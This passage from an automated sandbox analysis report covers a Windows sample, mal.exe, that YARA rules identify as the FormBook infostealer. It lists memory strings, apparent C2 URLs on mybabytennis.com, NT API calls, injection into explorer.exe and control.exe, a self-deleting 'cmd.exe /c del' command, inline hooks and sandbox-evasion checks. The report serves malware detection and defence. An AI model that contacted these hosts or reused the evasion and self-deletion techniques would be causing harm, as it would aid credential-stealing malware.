          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/Migraine_Pain_Relief.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lp
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/Parental_Control.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBx
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/display.cfm
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/fashion_trends.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxA1
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/find_a_tutor.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxA1IN
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/px.js?ch=1
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/px.js?ch=2
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/sk-logabpstatus.php?a=aDNHUmh6Q0JZczhsWUF1VWNMaFBPajRtSXdZNU1RMWxXTi9ia3
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: mal.exe, 00000000.00000003.206412694.0000000008008000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: mal.exe, 00000000.00000003.204113869.000000000800E000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: mal.exe, 00000000.00000003.203919342.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr-3
          Source: mal.exe, 00000000.00000003.204113869.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr.kr
          Source: mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krB
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.sarahcarver.com
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.sarahcarver.com/
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: mal.exe, 00000000.00000003.205252766.0000000008008000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic&
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: mal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: mal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deZ
          Source: mal.exe, 00000000.00000003.210675196.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deeg
          Source: mal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deu
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: mal.exe, 00000000.00000003.204709826.0000000008007000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnf
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: https://www.domain.com/controlpanel/domaincentral/3.0/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00419F3B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03029F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03029E10 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03029E90 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03029D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03029F3B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03029E8A NtClose,
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0041D14B
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0041E224
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00409E3B
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0041E6AC
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0041DFC7
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463D466
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04641D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04642D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04570D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046425DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04596E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463D616
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04642EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04641FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464E824
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631002
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046428EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046420A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04594120
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046422AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04642B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463DBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046303DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0302E224
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03012FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0302DFC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03019E3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03019E40
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0302E6AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03012D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_03012D90
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0457B150 appears 45 times
          Source: mal.exeBinary or memory string: OriginalFilename vs mal.exe
          Source: mal.exe, 00000002.00000002.303382209.0000000001281000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs mal.exe
          Source: mal.exe, 00000002.00000002.304248088.000000000193F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs mal.exe
          Source: mal.exeBinary or memory string: OriginalFilenameObjectEqualityCompar.exe8 vs mal.exe
          Source: mal.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: mal.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\mal.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mal.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_01
          Source: mal.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\mal.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\mal.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: mal.exeVirustotal: Detection: 60%
          Source: mal.exeMetadefender: Detection: 20%
          Source: mal.exeReversingLabs: Detection: 63%
          Source: unknownProcess created: C:\Users\user\Desktop\mal.exe 'C:\Users\user\Desktop\mal.exe'
          Source: C:\Users\user\Desktop\mal.exeProcess created: C:\Users\user\Desktop\mal.exe C:\Users\user\Desktop\mal.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mal.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\mal.exeProcess created: C:\Users\user\Desktop\mal.exe C:\Users\user\Desktop\mal.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mal.exe'
          Source: C:\Users\user\Desktop\mal.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: mal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: mal.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: mal.exe, 00000002.00000002.303734652.0000000001690000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.469738032.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: mal.exe, 00000002.00000002.303620114.0000000001530000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mal.exe, 00000002.00000002.303734652.0000000001690000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: mal.exe, 00000002.00000002.303620114.0000000001530000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00A97535 push esp; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0302CF02 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0302CF0B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0302CF6C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0302CEB5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85599061274

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEE
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mal.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
